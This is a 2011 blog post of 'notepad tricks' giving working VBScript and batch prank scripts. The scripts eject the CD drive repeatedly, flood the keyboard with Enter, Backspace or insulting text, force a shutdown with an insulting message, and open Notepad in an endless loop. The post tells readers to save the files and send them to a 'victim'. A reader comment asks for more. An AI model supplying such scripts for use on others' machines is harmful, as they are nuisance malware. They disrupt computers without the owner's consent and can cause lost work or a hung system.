Wednesday, November 16, 2011

Small Notepad Tricks for Fun...!!!



Hey Guys, In this post I will show you some notepad tricks. Which you can use on your friends and enemy’s just for fun. Copy following codes in notepad and save as specified.

Pop out of cd drive continually:

set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Now save it as “anyname.VBS” and then click it.

Toggle Caps Lock button:

set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Now save it as “anyname.VBS” and click on it.

Shut down some one’s PC with your customize message:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" –S

And save it as ”anyname.BAT” and send to victim.

Small script to frustrate you friends/enemy which hit enter simultaneously:

set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Now save it as “anyname.VBS” and send to victim.

Small script to frustrate you friends/enemy which hit enter simultaneously:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Now save it as “anyname.VBS” and send to victim.

Hack victims keyboard and forcefully make him type “You are a fool” continuously:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Now save it as “anyname.VBS” and send to victim.

Open notepad continually in victims machine:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Now save it as “anyname.BAT” and send to victim.


1 comment:

  1. hey mate...
    nice post...can u give me some more like this one...

    ReplyDelete